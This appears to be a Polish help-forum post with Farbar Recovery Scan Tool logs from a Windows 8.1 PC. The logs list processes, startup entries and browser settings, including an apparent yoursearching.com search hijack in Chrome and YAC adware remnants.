  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-21 09:25:08.734
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-20 14:30:37.404
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-20 14:30:37.400
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-20 11:45:55.176
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-20 11:45:55.176
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-20 11:16:44.011
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-20 11:16:44.010
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.


==================== Statystyki pamięci ===========================

Procesor: Intel(R) Core(TM) i5-4440 CPU @ 3.10GHz
Procent pamięci w użyciu: 26%
Całkowita pamięć fizyczna: 8136.02 MB
Dostępna pamięć fizyczna: 5962.84 MB
Całkowita pamięć wirtualna: 9416.02 MB
Dostępna pamięć wirtualna: 7006.62 MB

==================== Dyski ================================

Drive c: (System) (Fixed) (Total:149.92 GB) (Free:67.58 GB) NTFS
Drive f: (Programy) (Fixed) (Total:313.26 GB) (Free:177.88 GB) NTFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 16C9E122)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=149.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=313.3 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=468 GB) - (Type=05)

==================== Koniec  Addition.txt ============================

FRST
Kod: Zaznacz wszystko
Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 23-04-2017 01
Uruchomiony przez Adam (administrator)  KUTYLA (24-04-2017 13:51:47)
Uruchomiony z F:\wiro
Załadowane profile: Adam (Dostępne profile: Adam & Administrator)
Platform: Windows 8.1 (Update) (X64) Język: Polski (Polska)
Internet Explorer Wersja 11 (Domyślna przeglądarka: Chrome)
Tryb startu: Normal
Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesy (filtrowane) =================

(Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
() C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe
(MICRO-STAR INTERNATIONAL CO., LTD.) C:\Program Files (x86)\MSI\MSITrigger\MSI_Trigger_Service.exe
() C:\Program Files (x86)\MSI Afterburner\Bundle\OSDServer\RTSS.exe
(Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
(StarWind Software) C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
(AVG Technologies) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe
() C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
(AVG Technologies) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesApp64.exe
(Microsoft Corporation) C:\Windows\System32\vds.exe
(AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.3\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.3\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTsysTray8.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Akamai Inc.) C:\Users\Adam\AppData\Roaming\Octoshape\Octoshape Streaming Services\InfiniteMediaAcceleration.exe
(Charity Engine) C:\Program Files (x86)\BOINC\boinctray.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Rejestr (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-07-15] (Realtek Semiconductor)
HKLM\...\Run: [ISCT Tray] => C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTsysTray8.exe [5860656 2014-08-25] (Intel Corporation)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-04-04] (AVAST Software)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation)
HKLM-x32\...\Run: [Device Detector] => C:\Program Files (x86)\Common Files\ACD Systems\EN\DevDetect.exe [217088 2003-11-26] (ACD Systems, Ltd.)
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr\raptrstub.exe [56080 2015-11-20] (Raptr, Inc)
HKLM-x32\...\Run: [EaseUS EPM tray] => C:\Program Files (x86)\EaseUS\EaseUS Partition Master 10.2\bin\EpmNews.exe [2089056 2014-11-18] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [Smart File Advisor] => C:\Program Files (x86)\Smart File Advisor\sfa.exe [282384 2015-03-22] (Filefacts.net)
HKLM-x32\...\Run: [boinctray] => C:\Program Files (x86)\BOINC\boinctray.exe [71312 2014-03-07] (Charity Engine)
HKLM-x32\...\Run: [boincmgr] => C:\Program Files (x86)\BOINC\charityengine.exe [3757712 2014-03-07] (Charity Engine)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [28344776 2017-04-17] (Dropbox, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [GG] => C:\Users\Adam\AppData\Local\GG\Application\gghub.exe [4078144 2015-04-10] (GG Network S.A.)
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [Tlen.pl] => F:\Tlen7\tlen7.exe [82432 2011-04-11] ()
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7416088 2015-02-19] (Piriform Ltd)
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [DAEMON Tools Lite] => C:\Program Files\DAEMON Tools Lite\DTLite.exe [5585136 2015-03-31] (Disc Soft Ltd)
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [AlcoholAutomount] => C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe [39376 2015-03-12] (Alcohol Soft Development Team)
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [AceStream] => C:\Users\Adam\AppData\Roaming\ACEStream\engine\ace_engine.exe
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [IPLA!] => C:\Program Files (x86)\ipla\ipla.exe [21032736 2016-07-11] (Cyfrowy Polsat S.A.)
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [Octoshape Streaming Services] => C:\Users\Adam\AppData\Roaming\Octoshape\Octoshape Streaming Services\InfiniteMediaAcceleration.exe [267048 2016-10-13] (Akamai Inc.)
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\MountPoints2: {ef3b16a7-e760-11e4-82b3-d8cb8a1d695b} - "E:\setup.exe"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [788480 2014-10-29] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-03-21] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-03-21] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-03-21] (Google)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-04-04] (AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-04-04] (AVAST Software)
ShellIconOverlayIdentifiers-x32: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2015-09-28]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.163\SSScheduler.exe (McAfee, Inc.)

==================== Internet (filtrowane) ====================

(Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{97873D01-DB11-4BD3-B41E-FEDF993D4E26}: [NameServer] 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1
Tcpip\..\Interfaces\{FFDF1842-EE36-418F-8951-CD09355D40D6}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\Software\Microsoft\Internet Explorer\Main,Start Page =
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1070030570-2694662635-206350218-1001 -> {23594953-016F-416E-98D1-75C17FE5C866} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=B011PL0D20150226&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1070030570-2694662635-206350218-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.google.com/search?q={sear
SearchScopes: HKU\S-1-5-21-1070030570-2694662635-206350218-1001 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1070030570-2694662635-206350218-1001 -> {szukaj.gazeta.pl} URL = hxxp://szukaj.gazeta.pl/internet/0,0.html?slowo={searchTerms}
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-04-04] (AVAST Software)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\ssv.dll [2017-04-12] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-04-04] (AVAST Software)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-04-12] (Oracle Corporation)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} -  Brak pliku
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} -  Brak pliku
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} -  Brak pliku

FireFox:
========
FF DefaultProfile: ti2j30g5.default
FF ProfilePath: C:\Users\Adam\AppData\Roaming\Mozilla\Firefox\Profiles\ti2j30g5.default [2017-04-24]
FF DefaultSearchUrl: Mozilla\Firefox\Profiles\ti2j30g5.default -> hxxps://www.google.com/search?bcutc=sp-006
FF Keyword.URL: Mozilla\Firefox\Profiles\ti2j30g5.default -> hxxps://www.google.com/search?bcutc=sp-006
FF SearchPlugin: C:\Users\Adam\AppData\Roaming\Mozilla\Firefox\Profiles\ti2j30g5.default\searchplugins\google-avast.xml [2017-04-12]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: (Avast Online Security) - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-09-26]
FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: (Avast SafePrice) - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-09-26]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor => nie znaleziono
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_148.dll [2017-04-11] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.0 -> F:\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> F:\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> F:\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-11] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-04-12] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-04-12] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-11] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-11] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1070030570-2694662635-206350218-1001: @octoshape.com/Octoshape Streaming Services,version=1.0 -> C:\Users\Adam\AppData\Roaming\Octoshape\Octoshape Streaming Services\sua-1702150-0-npoctoshape.dll [2017-02-15] (Octoshape ApS)
FF Plugin ProgramFiles/Appdata: C:\Users\Adam\AppData\Roaming\mozilla\plugins\npoctoshape.dll [2017-03-23] (Octoshape ApS)

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://google.pl/
CHR StartupUrls: Default -> "hxxp://google.pl/","hxxp://www.yoursearching.com/?type=hp&ts=1449687316&z=196b1e7bef7940c46720594gcz6z9t0q7bemacag2z&from=cornl&uid=ST1000DM003-1ER162_Z4Y42GHSXXXXZ4Y42GHS"
CHR DefaultSearchURL: Default -> hxxp://www.yoursearching.com/web/?type=ds&ts=1449687316&z=196b1e7bef7940c46720594gcz6z9t0q7bemacag2z&from=cornl&uid=ST1000DM003-1ER162_Z4Y42GHSXXXXZ4Y42GHS&q={searchTerms}
CHR DefaultSearchKeyword: Default -> yoursearching
CHR Profile: C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default [2017-04-24]
CHR Extension: (Prezentacje Google) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-27]
CHR Extension: (Dokumenty Google) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-27]
CHR Extension: (Dysk Google) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (YouTube) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-25]
CHR Extension: (Google Search) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Adobe Acrobat) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-03-05]
CHR Extension: (Avast SafePrice) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2017-03-17]
CHR Extension: (Arkusze Google) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-27]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2017-03-21]
CHR Extension: (Dokumenty Google offline) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-03]
CHR Extension: (AdBlock) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-04-24]
CHR Extension: (ModHeader) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\idgpnmonknjnojddfkpgkljpfnnfcklj [2017-02-24]
CHR Extension: (User-Agent Switcher) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkmofgnohbedopheiphabfhfjgkhfcgf [2015-02-27]
CHR Extension: (Ace Stream Web Extension) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\mjbepbhonbojpoaenhckjocchgfiaofo [2016-08-08]
CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09]
CHR Extension: (Gmail) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-29]
CHR Extension: (Chrome Media Router) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-04]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx <nie znaleziono>
